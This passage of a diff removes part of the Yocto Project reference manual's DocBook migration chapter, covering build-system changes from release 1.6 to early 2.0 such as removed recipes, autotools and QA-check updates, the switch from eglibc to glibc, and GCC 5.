- a shell function and then call the function.
- Here is an example:
- <literallayout class='monospaced'>
- my_postprocess_function() {
- echo "hello" > ${IMAGE_ROOTFS}/hello.txt
- }
- ROOTFS_POSTPROCESS_COMMAND += "my_postprocess_function; "
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='migration-1.6-package-test-ptest'>
- <title>Package Test (ptest)</title>
-
- <para>
- Package Tests (ptest) are built but not installed by default.
- For information on using Package Tests, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages with ptest</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For information on the <filename>ptest</filename> class, see the
- "<link linkend='ref-classes-ptest'><filename>ptest.bbclass</filename></link>"
- section.
- </para>
- </section>
-
- <section id='migration-1.6-build-changes'>
- <title>Build Changes</title>
-
- <para>
- Separate build and source directories have been enabled
- by default for selected recipes where it is known to work
- (a whitelist) and for all recipes that inherit the
- <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
- class.
- In future releases the
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class will enable a separate build directory by default as
- well.
- Recipes building Autotools-based
- software that fails to build with a separate build directory
- should be changed to inherit from the
- <link linkend='ref-classes-autotools'><filename>autotools-brokensep</filename></link>
- class instead of the <filename>autotools</filename> or
- <filename>autotools_stage</filename>classes.
- </para>
- </section>
-
- <section id='migration-1.6-building-qemu-native'>
- <title><filename>qemu-native</filename></title>
-
- <para>
- <filename>qemu-native</filename> now builds without
- SDL-based graphical output support by default.
- The following additional lines are needed in your
- <filename>local.conf</filename> to enable it:
- <literallayout class='monospaced'>
- PACKAGECONFIG_pn-qemu-native = "sdl"
- ASSUME_PROVIDED += "libsdl-native"
- </literallayout>
- <note>
- The default <filename>local.conf</filename>
- contains these statements.
- Consequently, if you are building a headless system and using
- a default <filename>local.conf</filename> file, you will need
- comment these two lines out.
- </note>
- </para>
- </section>
-
- <section id='migration-1.6-core-image-basic'>
- <title><filename>core-image-basic</filename></title>
-
- <para>
- <filename>core-image-basic</filename> has been renamed to
- <filename>core-image-full-cmdline</filename>.
- </para>
-
- <para>
- In addition to <filename>core-image-basic</filename> being renamed,
- <filename>packagegroup-core-basic</filename> has been renamed to
- <filename>packagegroup-core-full-cmdline</filename> to match.
- </para>
- </section>
-
- <section id='migration-1.6-licensing'>
- <title>Licensing</title>
-
- <para>
- The top-level <filename>LICENSE</filename> file has been changed
- to better describe the license of the various components of
- <link linkend='oe-core'>OE-Core</link>.
- However, the licensing itself remains unchanged.
- </para>
-
- <para>
- Normally, this change would not cause any side-effects.
- However, some recipes point to this file within
- <link linkend='var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></link>
- (as <filename>${COREBASE}/LICENSE</filename>) and thus the
- accompanying checksum must be changed from
- 3f40d7994397109285ec7b81fdeb3b58 to
- 4d92cd373abda3937c2bc47fbc49d690.
- A better alternative is to have
- <filename>LIC_FILES_CHKSUM</filename> point to a file
- describing the license that is distributed with the source
- that the recipe is building, if possible, rather than pointing
- to <filename>${COREBASE}/LICENSE</filename>.
- </para>
- </section>
-
- <section id='migration-1.6-cflags-options'>
- <title><filename>CFLAGS</filename> Options</title>
-
- <para>
- The "-fpermissive" option has been removed from the default
- <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
- value.
- You need to take action on individual recipes that fail when
- building with this option.
- You need to either patch the recipes to fix the issues reported by
- the compiler, or you need to add "-fpermissive" to
- <filename>CFLAGS</filename> in the recipes.
- </para>
- </section>
-
- <section id='migration-1.6-custom-images'>
- <title>Custom Image Output Types</title>
-
- <para>
- Custom image output types, as selected using
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>,
- must declare their dependencies on other image types (if any) using
- a new
- <link linkend='var-IMAGE_TYPEDEP'><filename>IMAGE_TYPEDEP</filename></link>
- variable.
- </para>
- </section>
-
- <section id='migration-1.6-do-package-write-task'>
- <title>Tasks</title>
-
- <para>
- The <filename>do_package_write</filename> task has been removed.
- The task is no longer needed.
- </para>
- </section>
-
- <section id='migration-1.6-update-alternatives-provider'>
- <title><filename>update-alternative</filename> Provider</title>
-
- <para>
- The default <filename>update-alternatives</filename> provider has
- been changed from <filename>opkg</filename> to
- <filename>opkg-utils</filename>.
- This change resolves some troublesome circular dependencies.
- The runtime package has also been renamed from
- <filename>update-alternatives-cworth</filename>
- to <filename>update-alternatives-opkg</filename>.
- </para>
- </section>
-
- <section id='migration-1.6-virtclass-overrides'>
- <title><filename>virtclass</filename> Overrides</title>
-
- <para>
- The <filename>virtclass</filename> overrides are now deprecated.
- Use the equivalent class overrides instead (e.g.
- <filename>virtclass-native</filename> becomes
- <filename>class-native</filename>.)
- </para>
- </section>
-
- <section id='migration-1.6-removed-renamed-recipes'>
- <title>Removed and Renamed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para><filename>packagegroup-toolset-native</filename> -
- This recipe is largely unused.
- </para></listitem>
- <listitem><para><filename>linux-yocto-3.8</filename> -
- Support for the Linux yocto 3.8 kernel has been dropped.
- Support for the 3.10 and 3.14 kernels have been added
- with the <filename>linux-yocto-3.10</filename> and
- <filename>linux-yocto-3.14</filename> recipes.
- </para></listitem>
- <listitem><para><filename>ocf-linux</filename> -
- This recipe has been functionally replaced using
- <filename>cryptodev-linux</filename>.
- </para></listitem>
- <listitem><para><filename>genext2fs</filename> -
- <filename>genext2fs</filename> is no longer used by the
- build system and is unmaintained upstream.
- </para></listitem>
- <listitem><para><filename>js</filename> -
- This provided an ancient version of Mozilla's javascript
- engine that is no longer needed.
- </para></listitem>
- <listitem><para><filename>zaurusd</filename> -
- The recipe has been moved to the
- <filename>meta-handheld</filename> layer.
- </para></listitem>
- <listitem><para><filename>eglibc 2.17</filename> -
- Replaced by the <filename>eglibc 2.19</filename>
- recipe.
- </para></listitem>
- <listitem><para><filename>gcc 4.7.2</filename> -
- Replaced by the now stable
- <filename>gcc 4.8.2</filename>.
- </para></listitem>
- <listitem><para><filename>external-sourcery-toolchain</filename> -
- this recipe is now maintained in the
- <filename>meta-sourcery</filename> layer.
- </para></listitem>
- <listitem><para><filename>linux-libc-headers-yocto 3.4+git</filename> -
- Now using version 3.10 of the
- <filename>linux-libc-headers</filename> by default.
- </para></listitem>
- <listitem><para><filename>meta-toolchain-gmae</filename> -
- This recipe is obsolete.
- </para></listitem>
- <listitem><para><filename>packagegroup-core-sdk-gmae</filename> -
- This recipe is obsolete.
- </para></listitem>
- <listitem><para><filename>packagegroup-core-standalone-gmae-sdk-target</filename> -
- This recipe is obsolete.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.6-removed-classes'>
- <title>Removed Classes</title>
-
- <para>
- The following classes have become obsolete and have been removed:
- <itemizedlist>
- <listitem><para><filename>module_strip</filename>
- </para></listitem>
- <listitem><para><filename>pkg_metainfo</filename>
- </para></listitem>
- <listitem><para><filename>pkg_distribute</filename>
- </para></listitem>
- <listitem><para><filename>image-empty</filename>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.6-reference-bsps'>
- <title>Reference Board Support Packages (BSPs)</title>
-
- <para>
- The following reference BSPs changes occurred:
- <itemizedlist>
- <listitem><para>The BeagleBoard
- (<filename>beagleboard</filename>) ARM reference hardware
- has been replaced by the BeagleBone
- (<filename>beaglebone</filename>) hardware.
- </para></listitem>
- <listitem><para>The RouterStation Pro
- (<filename>routerstationpro</filename>) MIPS reference
- hardware has been replaced by the EdgeRouter Lite
- (<filename>edgerouter</filename>) hardware.
- </para></listitem>
- </itemizedlist>
- The previous reference BSPs for the
- <filename>beagleboard</filename> and
- <filename>routerstationpro</filename> machines are still available
- in a new <filename>meta-yocto-bsp-old</filename> layer in the
- <ulink url='&YOCTO_GIT_URL;'>Source Repositories</ulink>
- at
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-yocto-bsp-old/'>http://git.yoctoproject.org/cgit/cgit.cgi/meta-yocto-bsp-old/</ulink>.
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.7-release'>
- <title>Moving to the Yocto Project 1.7 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.7 Release from the prior release.
- </para>
-
- <section id='migration-1.7-changes-to-setting-qemu-packageconfig-options'>
- <title>Changes to Setting QEMU <filename>PACKAGECONFIG</filename> Options in <filename>local.conf</filename></title>
-
- <para>
- The QEMU recipe now uses a number of
- <link linkend='var-PACKAGECONFIG'><filename>PACKAGECONFIG</filename></link>
- options to enable various optional features.
- The method used to set defaults for these options means that
- existing
- <filename>local.conf</filename> files will need to be be
- modified to append to <filename>PACKAGECONFIG</filename> for
- <filename>qemu-native</filename> and
- <filename>nativesdk-qemu</filename> instead of setting it.
- In other words, to enable graphical output for QEMU, you should
- now have these lines in <filename>local.conf</filename>:
- <literallayout class='monospaced'>
- PACKAGECONFIG_append_pn-qemu-native = " sdl"
- PACKAGECONFIG_append_pn-nativesdk-qemu = " sdl"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.7-minimum-git-version'>
- <title>Minimum Git version</title>
-
- <para>
- The minimum
- <ulink url='&YOCTO_DOCS_OM_URL;#git'>Git</ulink> version
- required on the build host is now 1.7.8 because the
- <filename>--list</filename> option is now required by
- BitBake's Git fetcher.
- As always, if your host distribution does not provide a version of
- Git that meets this requirement, you can use the
- <filename>buildtools-tarball</filename> that does.
- See the
- "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
- section for more information.
- </para>
- </section>
-
- <section id='migration-1.7-autotools-class-changes'>
- <title>Autotools Class Changes</title>
-
- <para>
- The following
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>
- class changes occurred:
- <itemizedlist>
- <listitem><para><emphasis>
- A separate build directory is now used by default:</emphasis>
- The <filename>autotools</filename> class has been changed
- to use a directory for building
- (<link linkend='var-B'><filename>B</filename></link>),
- which is separate from the source directory
- (<link linkend='var-S'><filename>S</filename></link>).
- This is commonly referred to as
- <filename>B != S</filename>, or an out-of-tree build.</para>
- <para>If the software being built is already capable of
- building in a directory separate from the source, you
- do not need to do anything.
- However, if the software is not capable of being built
- in this manner, you will
- need to either patch the software so that it can build
- separately, or you will need to change the recipe to
- inherit the
- <link linkend='ref-classes-autotools'><filename>autotools-brokensep</filename></link>
- class instead of the <filename>autotools</filename> or
- <filename>autotools_stage</filename> classes.
- </para></listitem>
- <listitem><para><emphasis>
- The <filename>--foreign</filename> option is
- no longer passed to <filename>automake</filename> when
- running <filename>autoconf</filename>:</emphasis>
- This option tells <filename>automake</filename> that a
- particular software package does not follow the GNU
- standards and therefore should not be expected
- to distribute certain files such as
- <filename>ChangeLog</filename>,
- <filename>AUTHORS</filename>, and so forth.
- Because the majority of upstream software packages already
- tell <filename>automake</filename> to enable foreign mode
- themselves, the option is mostly superfluous.
- However, some recipes will need patches for this change.
- You can easily make the change by patching
- <filename>configure.ac</filename> so that it passes
- "foreign" to <filename>AM_INIT_AUTOMAKE()</filename>.
- See
- <ulink url='http://cgit.openembedded.org/openembedded-core/commit/?id=01943188f85ce6411717fb5bf702d609f55813f2'>this commit</ulink>
- for an example showing how to make the patch.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.7-binary-configuration-scripts-disabled'>
- <title>Binary Configuration Scripts Disabled</title>
-
- <para>
- Some of the core recipes that package binary configuration scripts
- now disable the scripts due to the
- scripts previously requiring error-prone path substitution.
- Software that links against these libraries using these scripts
- should use the much more robust <filename>pkg-config</filename>
- instead.
- The list of recipes changed in this version (and their
- configuration scripts) is as follows:
- <literallayout class='monospaced'>
- directfb (directfb-config)
- freetype (freetype-config)
- gpgme (gpgme-config)
- libassuan (libassuan-config)
- libcroco (croco-6.0-config)
- libgcrypt (libgcrypt-config)
- libgpg-error (gpg-error-config)
- libksba (ksba-config)
- libpcap (pcap-config)
- libpcre (pcre-config)
- libpng (libpng-config, libpng16-config)
- libsdl (sdl-config)
- libusb-compat (libusb-config)
- libxml2 (xml2-config)
- libxslt (xslt-config)
- ncurses (ncurses-config)
- neon (neon-config)
- npth (npth-config)
- pth (pth-config)
- taglib (taglib-config)
- </literallayout>
- Additionally, support for <filename>pkg-config</filename> has been
- added to some recipes in the previous list in the rare cases
- where the upstream software package does not already provide
- it.
- </para>
- </section>
-
- <section id='migration-1.7-glibc-replaces-eglibc'>
- <title><filename>eglibc 2.19</filename> Replaced with <filename>glibc 2.20</filename></title>
-
- <para>
- Because <filename>eglibc</filename> and
- <filename>glibc</filename> were already fairly close, this
- replacement should not require any significant changes to other
- software that links to <filename>eglibc</filename>.
- However, there were a number of minor changes in
- <filename>glibc 2.20</filename> upstream that could require
- patching some software (e.g. the removal of the
- <filename>_BSD_SOURCE</filename> feature test macro).
- </para>
-
- <para>
- <filename>glibc 2.20</filename> requires version 2.6.32 or greater
- of the Linux kernel.
- Thus, older kernels will no longer be usable in conjunction with it.
- </para>
-
- <para>
- For full details on the changes in <filename>glibc 2.20</filename>,
- see the upstream release notes
- <ulink url='https://sourceware.org/ml/libc-alpha/2014-09/msg00088.html'>here</ulink>.
- </para>
- </section>
-
- <section id='migration-1.7-kernel-module-autoloading'>
- <title>Kernel Module Autoloading</title>
-
- <para>
- The
- <link linkend='var-module_autoload'><filename>module_autoload_*</filename></link>
- variable is now deprecated and a new
- <link linkend='var-KERNEL_MODULE_AUTOLOAD'><filename>KERNEL_MODULE_AUTOLOAD</filename></link>
- variable should be used instead.
- Also,
- <link linkend='var-module_conf'><filename>module_conf_*</filename></link>
- must now be used in conjunction with a new
- <link linkend='var-KERNEL_MODULE_PROBECONF'><filename>KERNEL_MODULE_PROBECONF</filename></link>
- variable.
- The new variables no longer require you to specify the module name
- as part of the variable name.
- This change not only simplifies usage but also allows the values
- of these variables to be appropriately incorporated into task
- signatures and thus trigger the appropriate tasks to re-execute
- when changed.
- You should replace any references to
- <filename>module_autoload_*</filename> with
- <filename>KERNEL_MODULE_AUTOLOAD</filename>, and add any modules
- for which <filename>module_conf_*</filename> is specified to
- <filename>KERNEL_MODULE_PROBECONF</filename>.
- </para>
- </section>
-
- <section id='migration-1.7-qa-check-changes'>
- <title>QA Check Changes</title>
-
- <para>
- The following changes have occurred to the QA check process:
- <itemizedlist>
- <listitem><para>
- Additional QA checks <filename>file-rdeps</filename>
- and <filename>build-deps</filename> have been added in
- order to verify that file dependencies are satisfied
- (e.g. package contains a script requiring
- <filename>/bin/bash</filename>) and build-time dependencies
- are declared, respectively.
- For more information, please see the
- "<link linkend='ref-qa-checks'>QA Error and Warning Messages</link>"
- chapter.
- </para></listitem>
- <listitem><para>
- Package QA checks are now performed during a new
- <link linkend='ref-tasks-package_qa'><filename>do_package_qa</filename></link>
- task rather than being part of the
- <link linkend='ref-tasks-package'><filename>do_package</filename></link>
- task.
- This allows more parallel execution.
- This change is unlikely to be an issue except for highly
- customized recipes that disable packaging tasks themselves
- by marking them as <filename>noexec</filename>.
- For those packages, you will need to disable the
- <filename>do_package_qa</filename> task as well.
- </para></listitem>
- <listitem><para>
- Files being overwritten during the
- <link linkend='ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></link>
- task now trigger an error instead of a warning.
- Recipes should not be overwriting files written to the
- sysroot by other recipes.
- If you have these types of recipes, you need to alter them
- so that they do not overwrite these files.</para>
- <para>You might now receive this error after changes in
- configuration or metadata resulting in orphaned files
- being left in the sysroot.
- If you do receive this error, the way to resolve the issue
- is to delete your
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- or to move it out of the way and then re-start the build.
- Anything that has been fully built up to that point and
- does not need rebuilding will be restored from the shared
- state cache and the rest of the build will be able to
- proceed as normal.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.7-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para>
- <filename>x-load</filename>:
- This recipe has been superseded by
- U-boot SPL for all Cortex-based TI SoCs.
- For legacy boards, the <filename>meta-ti</filename>
- layer, which contains a maintained recipe, should be used
- instead.
- </para></listitem>
- <listitem><para>
- <filename>ubootchart</filename>:
- This recipe is obsolete.
- A <filename>bootchart2</filename> recipe has been added
- to functionally replace it.
- </para></listitem>
- <listitem><para>
- <filename>linux-yocto 3.4</filename>:
- Support for the linux-yocto 3.4 kernel has been dropped.
- Support for the 3.10 and 3.14 kernels remains, while
- support for version 3.17 has been added.
- </para></listitem>
- <listitem><para>
- <filename>eglibc</filename> has been removed in favor of
- <filename>glibc</filename>.
- See the
- "<link linkend='migration-1.7-glibc-replaces-eglibc'><filename>eglibc 2.19</filename> Replaced with <filename>glibc 2.20</filename></link>"
- section for more information.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.7-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous change occurred:
- <itemizedlist>
- <listitem><para>
- The build history feature now writes
- <filename>build-id.txt</filename> instead of
- <filename>build-id</filename>.
- Additionally, <filename>build-id.txt</filename>
- now contains the full build header as printed by
- BitBake upon starting the build.
- You should manually remove old "build-id" files from your
- existing build history repositories to avoid confusion.
- For information on the build history feature, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.8-release'>
- <title>Moving to the Yocto Project 1.8 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 1.8 Release from the prior release.
- </para>
-
- <section id='migration-1.8-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been removed:
- <itemizedlist>
- <listitem><para><filename>owl-video</filename>:
- Functionality replaced by <filename>gst-player</filename>.
- </para></listitem>
- <listitem><para><filename>gaku</filename>:
- Functionality replaced by <filename>gst-player</filename>.
- </para></listitem>
- <listitem><para><filename>gnome-desktop</filename>:
- This recipe is now available in
- <filename>meta-gnome</filename> and is no longer needed.
- </para></listitem>
- <listitem><para><filename>gsettings-desktop-schemas</filename>:
- This recipe is now available in
- <filename>meta-gnome</filename> and is no longer needed.
- </para></listitem>
- <listitem><para><filename>python-argparse</filename>:
- The <filename>argparse</filename> module is already
- provided in the default Python distribution in a
- package named <filename>python-argparse</filename>.
- Consequently, the separate
- <filename>python-argparse</filename> recipe is no
- longer needed.
- </para></listitem>
- <listitem><para><filename>telepathy-python, libtelepathy, telepathy-glib, telepathy-idle, telepathy-mission-control</filename>:
- All these recipes have moved to
- <filename>meta-oe</filename> and are consequently no
- longer needed by any recipes in OpenEmbedded-Core.
- </para></listitem>
- <listitem><para><filename>linux-yocto_3.10</filename> and <filename>linux-yocto_3.17</filename>:
- Support for the linux-yocto 3.10 and 3.17 kernels has been
- dropped.
- Support for the 3.14 kernel remains, while support for
- 3.19 kernel has been added.
- </para></listitem>
- <listitem><para><filename>poky-feed-config-opkg</filename>:
- This recipe has become obsolete and is no longer needed.
- Use <filename>distro-feed-config</filename> from
- <filename>meta-oe</filename> instead.
- </para></listitem>
- <listitem><para><filename>libav 0.8.x</filename>:
- <filename>libav 9.x</filename> is now used.
- </para></listitem>
- <listitem><para><filename>sed-native</filename>:
- No longer needed.
- A working version of <filename>sed</filename> is expected
- to be provided by the host distribution.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.8-bluez'>
- <title>BlueZ 4.x / 5.x Selection</title>
-
- <para>
- Proper built-in support for selecting BlueZ 5.x in preference
- to the default of 4.x now exists.
- To use BlueZ 5.x, simply add "bluez5" to your
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- value.
- If you had previously added append files
- (<filename>*.bbappend</filename>) to make this selection, you can
- now remove them.
- </para>
-
- <para>
- Additionally, a <filename>bluetooth</filename> class has been added
- to make selection of the appropriate bluetooth support within a
- recipe a little easier.
- If you wish to make use of this class in a recipe, add something
- such as the following:
- <literallayout class='monospaced'>
- inherit bluetooth
- PACKAGECONFIG ??= "${@bb.utils.contains('DISTRO_FEATURES', 'bluetooth', '${BLUEZ}', '', d)}"
- PACKAGECONFIG[bluez4] = "--enable-bluetooth,--disable-bluetooth,bluez4"
- PACKAGECONFIG[bluez5] = "--enable-bluez5,--disable-bluez5,bluez5"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.8-kernel-build-changes'>
- <title>Kernel Build Changes</title>
-
- <para>
- The kernel build process was changed to place the source
- in a common shared work area and to place build artifacts
- separately in the source code tree.
- In theory, migration paths have been provided for most common
- usages in kernel recipes but this might not work in all cases.
- In particular, users need to ensure that
- <filename>${S}</filename> (source files) and
- <filename>${B}</filename> (build artifacts) are used
- correctly in functions such as
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- and
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>.
- For kernel recipes that do not inherit from
- <filename>kernel-yocto</filename> or include
- <filename>linux-yocto.inc</filename>, you might wish to
- refer to the <filename>linux.inc</filename> file in the
- <filename>meta-oe</filename> layer for the kinds of changes you
- need to make.
- For reference, here is the
- <ulink url='http://cgit.openembedded.org/meta-openembedded/commit/meta-oe/recipes-kernel/linux/linux.inc?id=fc7132ede27ac67669448d3d2845ce7d46c6a1ee'>commit</ulink>
- where the <filename>linux.inc</filename> file in
- <filename>meta-oe</filename> was updated.
- </para>
-
- <para>
- Recipes that rely on the kernel source code and do not inherit
- the module classes might need to add explicit dependencies on
- the <filename>do_shared_workdir</filename> kernel task, for example:
- <literallayout class='monospaced'>
- do_configure[depends] += "virtual/kernel:do_shared_workdir"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.8-ssl'>
- <title>SSL 3.0 is Now Disabled in OpenSSL</title>
-
- <para>
- SSL 3.0 is now disabled when building OpenSSL.
- Disabling SSL 3.0 avoids any lingering instances of the POODLE
- vulnerability.
- If you feel you must re-enable SSL 3.0, then you can add an
- append file (<filename>*.bbappend</filename>) for the
- <filename>openssl</filename> recipe to remove "-no-ssl3"
- from
- <link linkend='var-EXTRA_OECONF'><filename>EXTRA_OECONF</filename></link>.
- </para>
- </section>
-
- <section id='migration-1.8-default-sysroot-poisoning'>
- <title>Default Sysroot Poisoning</title>
-
- <para>
- <filename>gcc's</filename> default sysroot and include directories
- are now "poisoned".
- In other words, the sysroot and include directories are being
- redirected to a non-existent location in order to catch when
- host directories are being used due to the correct options not
- being passed.
- This poisoning applies both to the cross-compiler used within the
- build and to the cross-compiler produced in the SDK.
- </para>
-
- <para>
- If this change causes something in the build to fail, it almost
- certainly means the various compiler flags and commands are not
- being passed correctly to the underlying piece of software.
- In such cases, you need to take corrective steps.
- </para>
- </section>
-
- <section id='migration-1.8-rebuild-improvements'>
- <title>Rebuild Improvements</title>
-
- <para>
- Changes have been made to the
- <link linkend='ref-classes-base'><filename>base</filename></link>,
- <link linkend='ref-classes-autotools'><filename>autotools</filename></link>,
- and
- <link linkend='ref-classes-cmake'><filename>cmake</filename></link>
- classes to clean out generated files when the
- <link linkend='ref-tasks-configure'><filename>do_configure</filename></link>
- task needs to be re-executed.
- </para>
-
- <para>
- One of the improvements is to attempt to run "make clean" during
- the <filename>do_configure</filename> task if a
- <filename>Makefile</filename> exists.
- Some software packages do not provide a working clean target
- within their make files.
- If you have such recipes, you need to set
- <link linkend='var-CLEANBROKEN'><filename>CLEANBROKEN</filename></link>
- to "1" within the recipe, for example:
- <literallayout class='monospaced'>
- CLEANBROKEN = "1"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-1.8-qa-check-and-validation-changes'>
- <title>QA Check and Validation Changes</title>
-
- <para>
- The following QA Check and Validation Changes have occurred:
- <itemizedlist>
- <listitem><para>
- Usage of <filename>PRINC</filename>
- previously triggered a warning.
- It now triggers an error.
- You should remove any remaining usage of
- <filename>PRINC</filename> in any recipe or append file.
- </para></listitem>
- <listitem><para>
- An additional QA check has been added to detect usage of
- <filename>${D}</filename> in
- <link linkend='var-FILES'><filename>FILES</filename></link>
- values where
- <link linkend='var-D'><filename>D</filename></link> values
- should not be used at all.
- The same check ensures that <filename>$D</filename> is used
- in
- <filename>pkg_preinst/pkg_postinst/pkg_prerm/pkg_postrm</filename>
- functions instead of <filename>${D}</filename>.
- </para></listitem>
- <listitem><para>
- <link linkend='var-S'><filename>S</filename></link> now
- needs to be set to a valid value within a recipe.
- If <filename>S</filename> is not set in the recipe, the
- directory is not automatically created.
- If <filename>S</filename> does not point to a directory
- that exists at the time the
- <link linkend='ref-tasks-unpack'><filename>do_unpack</filename></link>
- task finishes, a warning will be shown.
- </para></listitem>
- <listitem><para>
- <link linkend='var-LICENSE'><filename>LICENSE</filename></link>
- is now validated for correct formatting of multiple
- licenses.
- If the format is invalid (e.g. multiple licenses are
- specified with no operators to specify how the multiple
- licenses interact), then a warning will be shown.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-1.8-miscellaneous-changes'>
- <title>Miscellaneous Changes</title>
-
- <para>
- The following miscellaneous changes have occurred:
- <itemizedlist>
- <listitem><para>
- The <filename>send-error-report</filename> script now
- expects a "-s" option to be specified before the server
- address.
- This assumes a server address is being specified.
- </para></listitem>
- <listitem><para>
- The <filename>oe-pkgdata-util</filename> script now
- expects a "-p" option to be specified before the
- <filename>pkgdata</filename> directory, which is now
- optional.
- If the <filename>pkgdata</filename> directory is not
- specified, the script will run BitBake to query
- <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
- from the build environment.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-</section>
-
-<section id='moving-to-the-yocto-project-2.0-release'>
- <title>Moving to the Yocto Project 2.0 Release</title>
-
- <para>
- This section provides migration information for moving to the
- Yocto Project 2.0 Release from the prior release.
- </para>
-
- <section id='migration-2.0-gcc-5'>
- <title>GCC 5</title>
-
- <para>
- The default compiler is now GCC 5.2.
- This change has required fixes for compilation errors in a number
- of other recipes.
- </para>
-
- <para>
- One important example is a fix for when the Linux kernel freezes at
- boot time on ARM when built with GCC 5.
- If you are using your own kernel recipe or source tree and
- building for ARM, you will likely need to apply this
- <ulink url='https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit?id=a077224fd35b2f7fbc93f14cf67074fc792fbac2'>patch</ulink>.
- The standard <filename>linux-yocto</filename> kernel source tree
- already has a workaround for the same issue.
- </para>
-
- <para>
- For further details, see
- <ulink url='https://gcc.gnu.org/gcc-5/changes.html'></ulink> and
- the porting guide at
- <ulink url='https://gcc.gnu.org/gcc-5/porting_to.html'></ulink>.
- </para>
-
- <para>
- Alternatively, you can switch back to GCC 4.9 or 4.8 by
- setting <filename>GCCVERSION</filename> in your configuration,
- as follows:
- <literallayout class='monospaced'>
- GCCVERSION = "4.9%"
- </literallayout>
- </para>
- </section>
-
- <section id='migration-2.0-Gstreamer-0.10-removed'>
- <title>Gstreamer 0.10 Removed</title>
-
- <para>
- Gstreamer 0.10 has been removed in favor of Gstreamer 1.x.
- As part of the change, recipes for Gstreamer 0.10 and related
- software are now located
- in <filename>meta-multimedia</filename>.
- This change results in Qt4 having Phonon and Gstreamer
- support in QtWebkit disabled by default.
- </para>
- </section>
-
- <section id='migration-2.0-removed-recipes'>
- <title>Removed Recipes</title>
-
- <para>
- The following recipes have been moved or removed:
- <itemizedlist>
- <listitem><para>
- <filename>bluez4</filename>: The recipe is obsolete and
- has been moved due to <filename>bluez5</filename>
- becoming fully integrated.
- The <filename>bluez4</filename> recipe now resides in
- <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>gamin</filename>: The recipe is obsolete and
- has been removed.
- </para></listitem>
- <listitem><para>
- <filename>gnome-icon-theme</filename>: The recipe's
- functionally has been replaced by
- <filename>adwaita-icon-theme</filename>.
- </para></listitem>
- <listitem><para>
- Gstreamer 0.10 Recipes: Recipes for Gstreamer 0.10 have
- been removed in favor of the recipes for Gstreamer 1.x.
- </para></listitem>
- <listitem><para>
- <filename>insserv</filename>: The recipe is obsolete and
- has been removed.
- </para></listitem>
- <listitem><para>
- <filename>libunique</filename>: The recipe is no longer
- used and has been moved to <filename>meta-oe</filename>.
- </para></listitem>
- <listitem><para>
- <filename>midori</filename>: The recipe's functionally
- has been replaced by <filename>epiphany</filename>.
- </para></listitem>
- <listitem><para>
- <filename>python-gst</filename>: The recipe is obsolete
- and has been removed since it only contains bindings for
- Gstreamer 0.10.
- </para></listitem>
- <listitem><para>
- <filename>qt-mobility</filename>: The recipe is obsolete and
- has been removed since it requires
- <filename>Gstreamer 0.10</filename>, which has been
- replaced.
- </para></listitem>
- <listitem><para>
- <filename>subversion</filename>: All 1.6.x versions of this
- recipe have been removed.
- </para></listitem>
- <listitem><para>
- <filename>webkit-gtk</filename>: The older 1.8.3 version
- of this recipe has been removed in favor of
- <filename>webkitgtk</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='migration-2.0-bitbake-datastore-improvements'>
- <title>BitBake datastore improvements</title>
-
- <para>
- The method by which BitBake's datastore handles overrides has
- changed.
- Overrides are now applied dynamically and
- <filename>bb.data.update_data()</filename> is now a no-op.
- Thus, <filename>bb.data.update_data()</filename> is no longer
- required in order to apply the correct overrides.
- In practice, this change is unlikely to require any changes to
- Metadata.
- However, these minor changes in behavior exist:
- <itemizedlist>
- <listitem><para>
- All potential overrides are now visible in the variable
- history as seen when you run the following:
- <literallayout class='monospaced'>
- $ bitbake -e
- </literallayout>
- </para></listitem>
- <listitem><para>
- <filename>d.delVar('</filename><replaceable>VARNAME</replaceable><filename>')</filename> and
